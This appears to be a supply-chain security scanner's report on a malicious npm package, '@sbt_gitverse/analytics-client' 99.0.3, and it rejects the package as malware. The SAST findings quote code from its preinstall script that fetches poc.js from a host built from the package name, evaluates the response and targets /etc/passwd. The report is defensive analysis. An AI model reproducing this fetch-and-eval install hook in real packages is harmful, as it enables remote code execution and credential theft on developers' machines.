All @sbt_gitverse/analytics-client versions
@sbt_gitverse/analytics-client @99.0.3
analytics-client utilities
Maintainers
Risk Dispositions (4 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
install-script:preinstall |
install-scripts | reject | AI | AI (install-scripts): Preinstall fetches and evals remote code while harvesting /etc/passwd — malicious by design, generalizes to all versions of this package. | |
semgrep:etc-passwd-access |
semgrep | reject | AI | AI (semgrep): Explicit /etc/passwd access in preinstall script for credential harvesting; this is the core malicious payload. | |
semgrep:eval-usage |
semgrep | reject | AI | AI (semgrep): eval() of remotely fetched code in preinstall — arbitrary RCE at install time, definitively malicious for this package. | |
bogus-package |
bogus-package | reject | AI | AI (bogus-package): All bogus-package signals confirmed: new publisher with rejected history, inflated semver, no repo, empty entry point — throwaway malware delivery package. |
SAST Findings (8)
[Always reject] Script: node preinstall.js
[Always reject] Matched 6 signal(s), weighted score 8: • [S_KNOWN_SPAM_PUBLISHER] Maintainer(s) previously flagged as spam: m0ntana. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 3 code file(s), 2025 bytes total. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.
--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (121ee33ab9f0a4cf48e44c561f81e935b7f29af1b98343471b7684c444d86bfa) The OpenSSF Package Analysis project identified '@sbt_gitverse/analytics-client' @ 99.0.3 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
[Always reject] Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 15 | let body = ""; 16 | res.on("data", chunk => { body += chunk; }); > 17 | res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line 18 | }).on("error", () => {}).on("timeout", function() { this.destroy(); });
[Always reject] Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 15 | let body = ""; 16 | res.on("data", chunk => { body += chunk; }); > 17 | res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line 18 | }).on("error", () => {}).on("timeout", function() { this.destroy(); });
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 283). Findings: 7 critical (+280), 1 low (+3).
Published to npm: